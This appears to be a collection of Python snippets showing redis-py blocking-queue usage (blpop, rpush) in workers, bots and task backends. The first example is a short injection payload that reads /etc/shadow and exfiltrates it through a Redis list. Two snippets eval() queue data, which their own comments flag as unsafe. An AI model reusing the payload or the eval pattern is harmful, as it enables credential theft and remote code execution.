Example #1
from redis import StrictRedis

def main():
    code = """
from redis import StrictRedis
myr = StrictRedis()
with open("/etc/shadow") as fin:
    myr.rpush("{}", fin.read())
"""

    inject(code.format(OKEY))
    myr = StrictRedis()
    print(myr.blpop(OKEY)[1])
Example #2
def response_thread():
    """
    A thread that takes results from the client thread,
    then formats a message and sends it back to the user.
    """
    print("Response thread started")

    r2 = StrictRedis(host='localhost', port=6379)
    while True:
        item = r2.blpop('prediction')
        #         print(item[1])
        item = item[1].decode("utf-8")
        item = json.loads(item)
        chat_id = item['chat_id']
        predictions = item['predictions']

        # Prepare the response message to the user
        reply = ""
        for i, pred in enumerate(predictions):
            reply += "{}. {} ({:.4f})\n".format(i + 1, pred['label'],
                                                pred['proba'])

        # Send the message back to the user
        bot.sendMessage(chat_id, reply)
        print("Message sent to user")
Example #3
class RedisQueue(object):
    def __init__(self, name, host='localhost', port=6379):
        # Default Redis parameters: host='localhost', port=6379, db=0,
        # where db selects which Redis database to use
        self.db = StrictRedis(host=host, port=port, db=0, password='123456')
        self.key = name

    def size(self):
        return self.db.llen(self.key)  # return the number of elements in the queue's list

    def add(self, message):
        self.db.rpush(self.key, message)  # append a new element at the right end of the queue

    def pool_block(self, timeout=None):
        # Pop and return the first element of the queue; if it is empty, block
        # until an element is pushed (for at most `timeout` seconds; None waits forever)
        item = self.db.blpop(self.key, timeout=timeout)
        if item is None:  # timed out
            return None
        return item[1].decode()

    def pool(self):
        # Pop and return the first element of the queue; returns None if the queue is empty
        item = self.db.lpop(self.key)
        return item.decode() if item is not None else None

    def peek(self):
        # Return the first element of the queue without removing it; None if the queue is empty
        item = self.db.lindex(self.key, 0)
        return item.decode() if item is not None else None
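
A minimal usage sketch for this queue, assuming a Redis server reachable with
the password hard-coded above:

q = RedisQueue('jobs')
q.add('job-1')
q.add('job-2')
print(q.size())          # 2
print(q.peek())          # 'job-1' (not removed)
print(q.pool())          # 'job-1'
print(q.pool_block(5))   # 'job-2', or None after waiting 5 seconds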
Example #4
class RedisQueue(object):
    """Redis 任务队列"""
    def __init__(self,
                 host=REDIS_HOST,
                 port=REDIS_PORT,
                 password=REDIS_PASSWORD):
        self.db = StrictRedis(host=host, port=port, password=password)

    def put(self, request, redis_key):
        """
        将Request任务存入Redis中
        :param request
        :param redis_key
        :return bool        是否存成功
        """

        if isinstance(request, POIRequest):
            args = request.args2str()
            logger.info('New Task, params: %s' % args)
            return self.db.rpush(redis_key, args)

        return False

    def get(self, redis_key, timeout=None):
        """
        Fetch a Request task from Redis
        :param redis_key
        :param timeout      how long to wait for a task
        :return POIRequest  the reconstructed Request
        """
        item = self.db.blpop(redis_key, timeout=timeout)
        if item is None:  # timed out without receiving a task
            return None
        args = item[1].decode()

        logger.info('RedisQueue, new task, args:%s' % args)
        # NOTE: eval() on data pulled from a queue is unsafe; json.loads is
        # preferable if args2str() produces JSON
        args = eval(args)

        return POIRequest(url=args['url'],
                          params=args['params'],
                          need_proxy=args['need_proxy'],
                          fail_time=args['fail_time'],
                          timeout=args['timeout'])

    def clear(self, redis_key):
        """
        清空任务队列
        :param redis_key
        """
        self.db.delete(redis_key)

    def empty(self, redis_key):
        """
        判断任务队列是否为空
        :param redis_key
        :return bool
        """
        return self.db.llen(redis_key) == 0
Example #5
    def run(self):
        print("Starting " + self.name)
        r = StrictRedis(connection_pool=self.pool)
        while True:
            pd = json.loads(r.blpop('prediction')[1].decode("utf-8"))
            self.bot.send_message(
                pd["chat_id"],
                text='\n'.join(str(label) for label in pd["predictions"]))
            pd = {}
        print("Exiting " + self.name)  # unreachable: the loop above never breaks
Example #6
def how_redis():
    # Illustrative arguments filled in so each call below is a valid
    # redis-py 3.x invocation (the original listed the methods bare)
    from redis import StrictRedis
    client = StrictRedis()
    key_list = ['key_' + str(i) for i in range(10)]
    client.delete(*key_list)
    client.zrem('name', *key_list)
    client.hdel('name', 'value', *key_list)
    client.lrem('name', count=0, value=10)
    client.zrange('name', 0, 0, withscores=True)
    client.zremrangebyrank('name', 0, 0)
    client.zincrby('name', 1, 'value')
    client.zadd('name', {'value': 1})
    client.zinterstore('dest', ['name'])
    client.mget(key_list)
    client.mset({'key_0': 'value'})
    pipe = client.pipeline()
    pipe.multi()
    client.zrevrangebyscore('name', 10, 0)
    client.blpop('name', timeout=1)
Example #7
def run():
    redis = StrictRedis()
    nm = libnmo.Nexmo(API_KEY, API_SECRET)
    logger.info("started! ^_^")
    logger.info("  starting balance: %f" % (nm.balance))
    logger.info("  current send list size: %d" % (redis.llen(SEND_KEY)))
    logger.info("  current error list size: %d" % (redis.llen(ERROR_KEY)))
    logger.info("  current sent coldstore list size: %d" %
                (redis.llen(SENTCS_KEY)))

    while True:
        if redis.get("ncooldown"):
            sleep(30)
        else:
            j_msg = json.loads(redis.blpop(SEND_KEY)[1].decode("utf-8"))
            logger.info("processing new message (%s->%s)" %
                        (j_msg["from"], j_msg["to"]))
            logger.debug("  body: %s" % (j_msg["body"]))
            message = libnmo.NexmoMsg.new_text(
                j_msg["from"],
                j_msg["to"],
                j_msg["body"],
                client_ref=j_msg.get("app", None),
                status_report_req=j_msg.get("dlr", False),
                flash_message=j_msg.get("flash", False))
            logger.debug("  created message")
            responses = nm.send_msg(message)
            # scrub api key and secret from coldstore/error object
            logger.debug("  sent request to nexmo")
            del message["api_key"]
            del message["api_secret"]
            thing = {
                "at": datetime.utcnow().isoformat() + "UTC",
                "message": message,
                "responses": responses
            }

            if any(int(r["status"]) > 0 for r in responses):
                # bad times :<
                for r in responses:
                    if int(r["status"]) > 0:
                        logger.error("    sending message failed, %s" %
                                     (r["error-text"]))
                logger.info("  added message to error list (%s)" % (ERROR_KEY))
                redis.rpush(ERROR_KEY, json.dumps(thing))
                continue

            logger.info("  message sent (%d parts), current balance: %f" %
                        (len(responses), nm.balance))
            redis.rpush(SENTCS_KEY, json.dumps(thing))
            logger.info(
                "  saved message and responses to outbound coldstore list (%s)"
                % (SENTCS_KEY))
            logger.info("finished processing message")
Example #8
def handle_updates(app_, redis_url):
    parsed = urllib.parse.urlparse(redis_url)
    redis_conn = StrictRedis(decode_responses=True,
                             host=parsed.hostname,
                             port=parsed.port)
    with app_.app_context():
        while True:
            _, msg = redis_conn.blpop('stand_updates')
            msg_json = json.loads(msg)
            job = Job.query.get(msg_json.get('id'))
            if logger.isEnabledFor(logging.DEBUG):
                logger.debug(msg)
Example #9
class RedisCli(object):
    def __init__(self):
        self.conn = None

    def build_connection(self):
        workerconf = common.conf
        redisconf = dict()
        redisconf['host'] = workerconf["redis_host"]
        redisconf['password'] = workerconf['redis_pass']
        redisconf['port'] = workerconf['redis_port']
        self.conn = StrictRedis(**redisconf)

    def remove_task(self, task_id):
        # move task from running to finished
        self.conn.lrem("running", 1, task_id)
        self.conn.lpush("finished", task_id)

    def run_task(self, task_id):
        # move task from waiting to running
        # task is removed from waiting list by blpop
        self.conn.lpush("running", task_id)

    def recode_bug(self, score, base64_vulnerability):
        # add disclosed vulnerabilities into 'vulnerable' list
        self.conn.zadd("vulnerable", {base64_vulnerability: score})

    def get_request(self):
        _request_id = self.conn.blpop("waiting", 10)
        if _request_id and _request_id[0] == b"waiting":
            request_id = _request_id[1]
        else:
            return None
        result = self.retrieve_request(request_id)
        logger.success("Retrieve one request from 'waiting'.")
        return result

    def retrieve_request(self, request_id):
        _request = self.conn.hget("request", request_id)
        try:
            request = base64.b64decode(_request)
            request_decoded = request.decode("utf8", "ignore")
        except Exception as e:
            logger.error(
                "Error decoding or fetching the request: %s" % request_id)
            return None
        else:
            return [request_id, request_decoded]

    def delete_request(self, request_id):
        self.conn.hdel("request", request_id)
        return None
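
The producer half of this waiting/running/finished scheme is not shown in the
example; it would store the request body in the 'request' hash and push the id
onto 'waiting'. A minimal sketch under those assumptions (identifier and body
are made up):

import base64
from redis import StrictRedis

conn = StrictRedis()
request_id = b"req-1"                        # hypothetical task identifier
body = base64.b64encode(b"GET / HTTP/1.1")   # matches the b64decode in retrieve_request
conn.hset("request", request_id, body)
conn.rpush("waiting", request_id)            # get_request() blpops from this list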
Example #10
class RPCModule(Module):

	def __init__(self, **conf):
		# super(RPCModule, self).__init__()
		Module.__init__(self)
		self.lua_scripts = {}
		self.conf = conf
		self.alive = True
		self.topic = config.RPC_TOPIC
		self.db = None
		self.app = None

	def reconnect(self):
		u"""Reconnect."""
		try:
			self.pool = ConnectionPool(socket_connect_timeout=3, **self.conf)
			# Socket options belong on the pool; once connection_pool is
			# given, StrictRedis ignores further connection kwargs
			self.db = StrictRedis(connection_pool=self.pool)
		except Exception:
			self.alive = False
			print(traceback.format_exc())

	def call(self, topic, f, callback, *args):
		u"""调用测试."""
		_data = json.dumps({
			"func": f,
			"ct": self.topic,
			"cb": callback,
			"args": args,
		})
		self.db.rpush(topic, _data)

	def Run(self):
		while not self.closeSig:
			topic, data = self.db.blpop(self.topic)
			data = json.loads(data)
			f = data.get("func", None)
			if f:
				ret = self.app.dispatch(f, data["args"])
				cb = data.get("cb", None)
				ct = data.get("ct", None)
				if cb and ct:
					self.call(ct, cb, "", ret)
	
	def onInit(self, app, setting):
		u"""初始化."""
		Module.onInit(self, app, setting)
		self.reconnect()
Example #11
def main(args=None):
    if args is None:
        args = sys.argv[1:]

    parser = argparse.ArgumentParser(description="Kinto Deployment Worker")
    parser.add_argument('--ini',
                        help='Application configuration file',
                        dest='ini_file')

    parsed_args = vars(parser.parse_args(args))
    logging.basicConfig(level=DEFAULT_LOG_LEVEL, format=DEFAULT_LOG_FORMAT)

    config_file = parsed_args['ini_file']
    env = bootstrap(config_file)
    registry = env['registry']

    r = StrictRedis(**registry.redis)

    while True:
        try:
            queue, b64_credentials = r.blpop(DEPLOY_QUEUE, 0)
        except KeyboardInterrupt:
            print("\rBye bye buddy")
            sys.exit(0)
        user_id = hmac_digest(registry.hmac_secret, b64_credentials)
        credentials = base64.b64decode(b64_credentials).decode('utf-8').split(':', 1)

        id_alwaysdata = r.get(ID_ALWAYSDATA_KEY.format(user_id))

        settings = {
            'id_alwaysdata': id_alwaysdata,
            'credentials': tuple(credentials),
            'postgresql_host': "postgresql-%s.alwaysdata.net" % id_alwaysdata,
            'ssh_host': "ssh-%s.alwaysdata.net" % id_alwaysdata,
            'ftp_host': "ftp-%s.alwaysdata.net" % id_alwaysdata,
            'prefixed_username': "******" % id_alwaysdata
        }

        status_handler = RedisStatusHandler(r, user_id)

        try:
            deploy_kinto_to_alwaysdata(status_handler, file_root=FILE_ROOT, **settings)
        except Exception as e:
            logger.error(e)
            # Retry later
            r.rpush(DEPLOY_QUEUE, b64_credentials)
Example #12
def main():
    redis = StrictRedis(**config)
    fakeredis = FakeStrictRedis()
    redis.flushall()
    fakeredis.flushall()

    print('[+] FakeRedis BLPOP:')
    now = time()
    popped = fakeredis.blpop('hello_world', 10)
    print('[*] Took %.2f seconds' % (time() - now))
    print('[*] Popped value:', popped)
    print()

    print('[+] Redis BLPOP:')
    now = time()
    popped = redis.blpop('hello_world', 10)
    print('[*] Took %.2f seconds' % (time() - now))
    print('[*] Popped value:', popped)
Example #13
class CoreWorker(Thread):
    def __init__(self, host, port):
        super().__init__()
        self.interface = StrictRedis(host, port)

    def run(self):
        print("Starting CoreWorker")
        while True:
            reply = self.interface.blpop("samp.core")
            if len(reply) < 2:
                print("ERROR: reply length is", len(reply))

            message = reply[1].decode('utf-8')

            print("> '%s'" % message)

            if message == "exit":
                break
Example #14
def main(queue_name):
    try:
        redis = StrictRedis(host=settings.REDIS_HOST,
                            charset="utf-8",
                            decode_responses=True)
    except Exception:
        print("Failed to connect")
        sys.exit(1)

    while True:
        print("waiting for message in queue \"{}\" ...".format(queue_name))
        _, msg = redis.blpop(queue_name)
        print("received message {}".format(msg))

        content = json.loads(msg)
        task_id = content.get('task_id')
        task_data = content.get('task_data')

        print("send task result to {}".format(task_id))
        redis.rpush(task_id, json.dumps({'task_result': task_data}))
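
The matching client for this worker is not part of the example, but the
protocol it implies is simple: push a task onto the request queue, then block
on your own task_id list for the reply. A minimal sketch with made-up names:

import json
from redis import StrictRedis

r = StrictRedis(decode_responses=True)
task_id = 'task:123'  # hypothetical per-request reply list
r.rpush('work', json.dumps({'task_id': task_id, 'task_data': {'n': 1}}))
_, reply = r.blpop(task_id)  # the worker rpushes the result onto task_id
print(json.loads(reply)['task_result'])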
Example #15
class RedisQueue(BaseQueue):
    queue_type = 'redis'

    def __init__(self, config: dict) -> None:
        super().__init__(config)
        self.connection = StrictRedis(**self.config)

    def set_qname(self, qname: str) -> 'RedisQueue':
        self.qname = qname
        return self

    def put(self, payload: bytes) -> bool:
        return self._put(self.qname, payload)

    def _put(self, qname: str, payload: bytes) -> bool:
        pipe = self.connection.pipeline()
        try:
            pipe.watch(qname)
            pipe.multi()
            pipe.rpush(qname, payload)
            pipe.execute()
            return True
        except WatchError:
            LOGGER.error(f'watch error queue name: {qname}')
            return False

    def get(self, timeout: float = 3) -> str:
        return self._get(self.qname, timeout)

    def _get(self, qname: str, timeout: float = 3) -> str:
        msg = self.connection.blpop(
            qname,
            timeout=timeout,
        )
        if not msg:
            raise DequeueTimeout
        _, job_rk = msg
        return job_rk.decode()
Example #16
def main(args=None):
    if args is None:
        args = sys.argv[1:]

    parser = argparse.ArgumentParser(description="Kinto Deployment Worker")
    parser.add_argument('--ini',
                        help='Application configuration file',
                        dest='ini_file')

    parsed_args = vars(parser.parse_args(args))
    logging.basicConfig(level=DEFAULT_LOG_LEVEL, format=DEFAULT_LOG_FORMAT)

    config_file = parsed_args['ini_file']
    env = bootstrap(config_file)
    registry = env['registry']

    r = StrictRedis(**registry.redis)

    while True:
        queue, b64_credentials = r.blpop(DEPLOY_QUEUE, 0)
        user_id = hmac_digest(registry.hmac_secret, b64_credentials)
        credentials = base64.b64decode(b64_credentials).decode('utf-8').split(':', 1)

        id_alwaysdata = r.get(ID_ALWAYSDATA_KEY.format(user_id))

        settings = {
            'id_alwaysdata': id_alwaysdata,
            'credentials': tuple(credentials),
            'postgresql_host': "postgresql-%s.alwaysdata.net" % id_alwaysdata,
            'ssh_host': "ssh-%s.alwaysdata.net" % id_alwaysdata,
            'ftp_host': "ftp-%s.alwaysdata.net" % id_alwaysdata,
            'prefixed_username': "******" % id_alwaysdata
        }

        status_handler = RedisStatusHandler(r, user_id)

        deploy_kinto_to_alwaysdata(status_handler, file_root=FILE_ROOT, **settings)
Example #17
class RedisQueue(object):
    """Simple high level redis wrapper over lists."""
    def __init__(self, key=KEY):
        # create the key
        if not key:
            key = str(uuid.uuid4())
        self.key = key
        # and the redis connection
        self.rcon = StrictRedis()
        # clear the sentinels (None(s))
        self.rcon.lrem(self.key, 0, RedisQueue._serialize(None))

    @staticmethod
    def _serialize(item):
        # bad habit
        return repr(item)

    @staticmethod
    def _deserialize(item):
        # even worse
        try:
            return eval(item, GLOBS)
        except Exception as exc:
            return "<Invalid> - {}".format(exc)

    def push(self, item):
        """Insert an item in the queue."""
        # append a "serialized" item to the list (bad habit)
        self.rcon.rpush(self.key, RedisQueue._serialize(item))

    def pop(self, block=True):
        """Remove an item from the queue."""
        if block:  # wait until something is available
            item = self.rcon.blpop(self.key)[1]
        else:
            item = self.rcon.lpop(self.key)
        return RedisQueue._deserialize(item)
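
As the comments admit, repr()/eval() round-tripping is dangerous: eval()
executes whatever arrives on the queue. For plain data types, a JSON-based
pair of helpers is a safer substitute; this sketch would replace the two
static methods above and is not part of the original:

    @staticmethod
    def _serialize(item):
        # json.dumps instead of repr(): serializes data, never code
        return json.dumps(item)

    @staticmethod
    def _deserialize(item):
        try:
            # json.loads instead of eval(): queue content cannot execute
            return json.loads(item)
        except (TypeError, ValueError) as exc:
            return "<Invalid> - {}".format(exc)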
Example #18
class RedisEngine(QueueEngine):
	"""docstring for RedisEngine"""
	def __init__(self):
		super(RedisEngine, self).__init__()
		self.r = None
		self.host = 'localhost'
		self.port = 6379

	def connect(self):
		self.r = StrictRedis(self.host, self.port, db=0)
		return self.is_available()

	def is_available(self):
		print('is redis available')
		if self.r is None:
			return False
		return self.r.ping() is not None

	def enqueue(self, queue, msg, timeout=0):
		self.r.rpush(queue, msg)

	def dequeue(self, queue, timeout):
		rsp = self.r.blpop(queue, timeout=timeout)
		if rsp is None:  # timed out
			return None
		return rsp[1]
Example #20
class KartonBackend:
    def __init__(self, config):
        self.config = config
        self.redis = StrictRedis(
            host=config["redis"]["host"],
            port=int(config["redis"].get("port", 6379)),
            decode_responses=True,
        )
        self.minio = Minio(
            config["minio"]["address"],
            access_key=config["minio"]["access_key"],
            secret_key=config["minio"]["secret_key"],
            secure=bool(int(config["minio"].get("secure", True))),
        )

    @property
    def default_bucket_name(self) -> str:
        return self.config.minio_config["bucket"]

    @staticmethod
    def get_queue_name(identity: str, priority: TaskPriority) -> str:
        """
        Return Redis routed task queue name for given identity and priority

        :param identity: Karton service identity
        :param priority: Queue priority (TaskPriority enum value)
        :return: Queue name
        """
        return f"karton.queue.{priority.value}:{identity}"

    @staticmethod
    def get_queue_names(identity: str) -> List[str]:
        """
        Return all Redis routed task queue names for given identity,
        ordered by priority (descending). Used internally by Consumer.

        :param identity: Karton service identity
        :return: List of queue names
        """
        return [
            identity,  # Backwards compatibility (2.x.x)
            KartonBackend.get_queue_name(identity, TaskPriority.HIGH),
            KartonBackend.get_queue_name(identity, TaskPriority.NORMAL),
            KartonBackend.get_queue_name(identity, TaskPriority.LOW),
        ]

    @staticmethod
    def serialize_bind(bind: KartonBind) -> str:
        """
        Serialize KartonBind object (Karton service registration)

        :param bind: KartonBind object with bind definition
        :return: Serialized bind data
        """
        return json.dumps(
            {
                "info": bind.info,
                "version": bind.version,
                "filters": bind.filters,
                "persistent": bind.persistent,
            },
            sort_keys=True,
        )

    @staticmethod
    def unserialize_bind(identity: str, bind_data: str) -> KartonBind:
        """
        Deserialize KartonBind object for given identity.
        Compatible with Karton 2.x.x and 3.x.x

        :param identity: Karton service identity
        :param bind_data: Serialized bind data
        :return: KartonBind object with bind definition
        """
        bind = json.loads(bind_data)
        if isinstance(bind, list):
            # Backwards compatibility (v2.x.x)
            return KartonBind(
                identity=identity,
                info=None,
                version="2.x.x",
                persistent=not identity.endswith(".test"),
                filters=bind,
            )
        return KartonBind(
            identity=identity,
            info=bind["info"],
            version=bind["version"],
            persistent=bind["persistent"],
            filters=bind["filters"],
        )

    def get_bind(self, identity: str) -> KartonBind:
        """
        Get bind object for given identity

        :param identity: Karton service identity
        :return: KartonBind object
        """
        return self.unserialize_bind(
            identity, self.redis.hget(KARTON_BINDS_HSET, identity))

    def get_binds(self) -> List[KartonBind]:
        """
        Get all binds registered in Redis

        :return: List of KartonBind objects for subsequent identities
        """
        return [
            self.unserialize_bind(identity, raw_bind) for identity, raw_bind in
            self.redis.hgetall(KARTON_BINDS_HSET).items()
        ]

    def register_bind(self, bind: KartonBind) -> Optional[KartonBind]:
        """
        Register bind for Karton service and return the old one

        :param bind: KartonBind object with bind definition
        :return: Old KartonBind that was registered under this identity
        """
        with self.redis.pipeline(transaction=True) as pipe:
            pipe.hget(KARTON_BINDS_HSET, bind.identity)
            pipe.hset(KARTON_BINDS_HSET, bind.identity,
                      self.serialize_bind(bind))
            old_serialized_bind, _ = pipe.execute()

        if old_serialized_bind:
            return self.unserialize_bind(bind.identity, old_serialized_bind)
        else:
            return None

    def unregister_bind(self, identity: str) -> None:
        """
        Removes bind for identity
        :param identity: Identity to be unregistered
        """
        self.redis.hdel(KARTON_BINDS_HSET, identity)

    def set_consumer_identity(self, identity: str) -> None:
        """
        Sets identity for current Redis connection
        """
        return self.redis.client_setname(identity)

    def get_online_consumers(self) -> Dict[str, List[str]]:
        """
        Gets all online consumer identities

        :return: Dictionary {identity: [list of clients]}
        """
        bound_identities = defaultdict(list)
        for client in self.redis.client_list():
            bound_identities[client["name"]].append(client)
        return bound_identities

    def get_task(self, task_uid: str) -> Optional[Task]:
        """
        Get task object with given identifier

        :param task_uid: Task identifier
        :return: Task object
        """
        task_data = self.redis.get(f"{KARTON_TASK_NAMESPACE}:{task_uid}")
        if not task_data:
            return None
        return Task.unserialize(task_data, backend=self)

    def get_tasks(self, task_uid_list: List[str]) -> List[Task]:
        """
        Get multiple tasks for given identifier list

        :param task_uid_list: List of task identifiers
        :return: List of task objects
        """
        task_list = self.redis.mget([
            f"{KARTON_TASK_NAMESPACE}:{task_uid}" for task_uid in task_uid_list
        ])
        return [
            Task.unserialize(task_data, backend=self)
            for task_data in task_list if task_data is not None
        ]

    def get_all_tasks(self) -> List[Task]:
        """
        Get all tasks registered in Redis

        :return: List with Task objects
        """
        tasks = self.redis.keys(f"{KARTON_TASK_NAMESPACE}:*")
        return [
            Task.unserialize(task_data) for task_data in self.redis.mget(tasks)
            if task_data is not None
        ]

    def register_task(self, task: Task) -> None:
        """
        Register task in Redis.

        Consumer should register only Declared tasks.
        Status change should be done using set_task_status.

        :param task: Task object
        """
        self.redis.set(f"{KARTON_TASK_NAMESPACE}:{task.uid}", task.serialize())

    def set_task_status(self,
                        task: Task,
                        status: TaskState,
                        consumer: Optional[str] = None) -> None:
        """
        Request task status change to be applied by karton-system

        :param task: Task object
        :param status: New task status (TaskState)
        :param consumer: Consumer identity
        """
        self.redis.rpush(
            KARTON_OPERATIONS_QUEUE,
            json.dumps({
                "status": status.value,
                "identity": consumer,
                "task": task.serialize(),
                "type": "operation",
            }),
        )

    def delete_task(self, task: Task) -> None:
        """
        Remove task from Redis

        :param task: Task object
        """
        self.redis.delete(f"{KARTON_TASK_NAMESPACE}:{task.uid}")

    def get_task_queue(self, queue: str) -> List[Task]:
        """
        Return all tasks in provided queue

        :param queue: Queue name
        :return: List with Task objects contained in queue
        """
        task_uids = self.redis.lrange(queue, 0, -1)
        return self.get_tasks(task_uids)

    def get_task_ids_from_queue(self, queue: str) -> List[str]:
        """
        Return all task UIDs in a queue

        :param queue: Queue name
        :return: List with task identifiers contained in queue
        """
        return self.redis.lrange(queue, 0, -1)

    def remove_task_queue(self, queue: str) -> List[Task]:
        """
        Remove task queue with all contained tasks

        :param queue: Queue name
        :return: List with Task objects contained in queue
        """
        pipe = self.redis.pipeline()
        pipe.lrange(queue, 0, -1)
        pipe.delete(queue)
        return self.get_tasks(pipe.execute()[0])

    def produce_unrouted_task(self, task: Task) -> None:
        """
        Add given task to unrouted task (``karton.tasks``) queue

        Task must be registered before with :py:meth:`register_task`

        :param task: Task object
        """
        self.redis.rpush(KARTON_TASKS_QUEUE, task.uid)

    def produce_routed_task(self, identity: str, task: Task) -> None:
        """
        Add given task to routed task queue of given identity

        Task must be registered using :py:meth:`register_task`

        :param identity: Karton service identity
        :param task: Task object
        """
        self.redis.rpush(self.get_queue_name(identity, task.priority),
                         task.uid)

    def consume_queues(self,
                       queues: Union[str, List[str]],
                       timeout: int = 0) -> Optional[Tuple[str, str]]:
        """
        Get item from queues (ordered from the most to the least prioritized)
        If there are no items, wait until one appear.

        :param queues: Redis queue name or list of names
        :param timeout: Waiting for item timeout (default: 0 = wait forever)
        :return: Tuple of [queue_name, item] objects or None if timeout has been reached
        """
        return self.redis.blpop(queues, timeout=timeout)

    def consume_routed_task(self,
                            identity: str,
                            timeout: int = 5) -> Optional[Task]:
        """
        Get routed task for given consumer identity.

        If there are no tasks, blocks until new one appears or timeout is reached.

        :param identity: Karton service identity
        :param timeout: Waiting for task timeout (default: 5)
        :return: Task object
        """
        item = self.consume_queues(
            self.get_queue_names(identity),
            timeout=timeout,
        )
        if not item:
            return None
        queue, data = item
        return self.get_task(data)

    @staticmethod
    def _log_channel(logger_name: Optional[str], level: Optional[str]) -> str:
        return ".".join(
            [KARTON_LOG_CHANNEL, (level or "*").lower(), logger_name or "*"])

    def produce_log(
        self,
        log_record: Dict[str, Any],
        logger_name: str,
        level: str,
    ) -> bool:
        """
        Push new log record to the logs channel

        :param log_record: Dict with log record
        :param logger_name: Logger name
        :param level: Log level
        :return: True if any active log consumer received log record
        """
        return (self.redis.publish(self._log_channel(logger_name, level),
                                   json.dumps(log_record)) > 0)

    def consume_log(
        self,
        timeout: int = 5,
        logger_filter: Optional[str] = None,
        level: Optional[str] = None,
    ) -> Iterator[Optional[Dict[str, Any]]]:
        """
        Subscribe to logs channel and yield subsequent log records
        or None if timeout has been reached.

        If you want to subscribe only to a specific logger name
        and/or log level, pass them via logger_filter and level arguments.

        :param timeout: Waiting for log record timeout (default: 5)
        :param logger_filter: Filter for name of consumed logger
        :param level: Log level
        :return: Dict with log record
        """
        with self.redis.pubsub() as pubsub:
            pubsub.psubscribe(self._log_channel(logger_filter, level))
            while pubsub.subscribed:
                item = pubsub.get_message(ignore_subscribe_messages=True,
                                          timeout=timeout)
                if item and item["type"] == "pmessage":
                    body = json.loads(item["data"])
                    if "task" in body and isinstance(body["task"], str):
                        body["task"] = json.loads(body["task"])
                    yield body
                yield None

    def increment_metrics(self, metric: KartonMetrics, identity: str) -> None:
        """
        Increments metrics for given operation type and identity

        :param metric: Operation metric type
        :param identity: Related Karton service identity
        """
        self.redis.hincrby(metric.value, identity, 1)

    def upload_object(
        self,
        bucket: str,
        object_uid: str,
        content: Union[bytes, BinaryIO],
        length: Optional[int] = None,
    ) -> None:
        """
        Upload resource object to underlying object storage (Minio)

        :param bucket: Bucket name
        :param object_uid: Object identifier
        :param content: Object content as bytes or file-like stream
        :param length: Object content length (if file-like object provided)
        """
        if isinstance(content, bytes):
            length = len(content)
            content = BytesIO(content)
        self.minio.put_object(bucket, object_uid, content, length)

    def upload_object_from_file(self, bucket: str, object_uid: str,
                                path: str) -> None:
        """
        Upload resource object file to underlying object storage

        :param bucket: Bucket name
        :param object_uid: Object identifier
        :param path: Path to the object content
        """
        self.minio.fput_object(bucket, object_uid, path)

    def get_object(self, bucket: str, object_uid: str) -> HTTPResponse:
        """
        Get resource object stream with the content.

        Returned response should be closed after use to release network resources.
        To reuse the connection, it's required to call `response.release_conn()`
        explicitly.

        :param bucket: Bucket name
        :param object_uid: Object identifier
        :return: Response object with content
        """
        return self.minio.get_object(bucket, object_uid)

    def download_object(self, bucket: str, object_uid: str) -> bytes:
        """
        Download resource object from object storage.

        :param bucket: Bucket name
        :param object_uid: Object identifier
        :return: Content bytes
        """
        reader = self.minio.get_object(bucket, object_uid)
        try:
            return reader.read()
        finally:
            reader.release_conn()
            reader.close()

    def download_object_to_file(self, bucket: str, object_uid: str,
                                path: str) -> None:
        """
        Download resource object from object storage to file

        :param bucket: Bucket name
        :param object_uid: Object identifier
        :param path: Target file path
        """
        self.minio.fget_object(bucket, object_uid, path)

    def list_objects(self, bucket: str) -> List[str]:
        """
        List identifiers of stored resource objects

        :param bucket: Bucket name
        :return: List of object identifiers
        """
        return [
            object.object_name for object in self.minio.list_objects(bucket)
        ]

    def remove_object(self, bucket: str, object_uid: str) -> None:
        """
        Remove resource object from object storage

        :param bucket: Bucket name
        :param object_uid: Object identifier
        """
        self.minio.remove_object(bucket, object_uid)

    def check_bucket_exists(self, bucket: str, create: bool = False) -> bool:
        """
        Check if bucket exists and optionally create it if it doesn't.

        :param bucket: Bucket name
        :param create: Create bucket if doesn't exist
        :return: True if the bucket already existed
        """
        if self.minio.bucket_exists(bucket):
            return True
        if create:
            self.minio.make_bucket(bucket)
        return False
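
consume_queues() leans on a documented BLPOP property worth spelling out: when
given several keys, Redis checks them in argument order, so listing queues
from highest to lowest priority turns BLPOP into a priority queue. A
standalone sketch of the same pattern with plain redis-py (queue names are
illustrative):

from redis import StrictRedis

r = StrictRedis(decode_responses=True)
queues = ["jobs:high", "jobs:normal", "jobs:low"]  # most to least prioritized

r.rpush("jobs:low", "cleanup")
r.rpush("jobs:high", "hotfix")

# BLPOP scans the keys left to right, so "hotfix" is served first even
# though "cleanup" was enqueued earlier.
print(r.blpop(queues, timeout=5))  # ('jobs:high', 'hotfix')
print(r.blpop(queues, timeout=5))  # ('jobs:low', 'cleanup')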
Example #21
import base64
from io import BytesIO

import requests
from redis import StrictRedis
import json
from PIL import Image


if __name__ == '__main__':
    queue = StrictRedis(host='localhost', port=6379)
    while True:
        data = queue.blpop("download")
        json_dict = data[1].decode('utf-8')
        data_dict = json.loads(json_dict)
        URL = data_dict['url']
        timestamp = data_dict['timestamp']

        ##Download image from url
        image_data = requests.get(URL).content
        file_name = timestamp + ".png"
        with open(file_name, 'wb') as outfile:
            outfile.write(image_data)

        ##Encode the image with base64
        image = Image.open(file_name)
        buffered = BytesIO()
        image.save(buffered, format="PNG")
        encoded_img = base64.b64encode(buffered.getvalue())
        encoded_img_str = encoded_img.decode('utf-8')
Example #22
import base64
import json

import requests
from redis import StrictRedis

r = StrictRedis(host='localhost', port=6379)
ENCODING = 'utf-8'
data = {}

def encodeImg(content):
    encoded_image = base64.b64encode(content)
    return encoded_image

while True:
    download = json.loads(r.blpop('download')[1].decode("utf-8"))
    print(download)
    try:
        if download["url"] != "":
            response = requests.get(download["url"])
            send_image = response.content
            encoded_image = encodeImg(send_image)

            base64_string = encoded_image.decode(ENCODING)
    except Exception as e:
        print(e)
    try:
        if download["img_id"] != "":
            base64_string = download["img_id"]
    except Exception as e:
        print(e)
Example #23
class Zone(object):
    def __init__(self):
        self.id = None
        self.world_path = ''
        self.entities = {}
        self.components = {}
        self.renderer_class = DefaultRenderer
        self.entities_by_component_name = {}
        self.ticking_entities = set()
        self.tick_interval = 1
        self.running = False
        self.redis = None
        self._max_id = 0

    @classmethod
    def from_config(cls, id, world_path):
        self = cls()

        self.id = id
        self.world_path = world_path

        self.load_config()

        return self

    @property
    def tick_key(self):
        return 'zone:%s:tick' % self.id

    @property
    def incoming_key(self):
        return 'zone:%s:incoming' % self.id

    @staticmethod
    def messages_key(entity_id):
        return 'entity:%s:messages' % entity_id

    def next_id(self):
        self._max_id += 1
        return self._max_id

    def load_config(self):
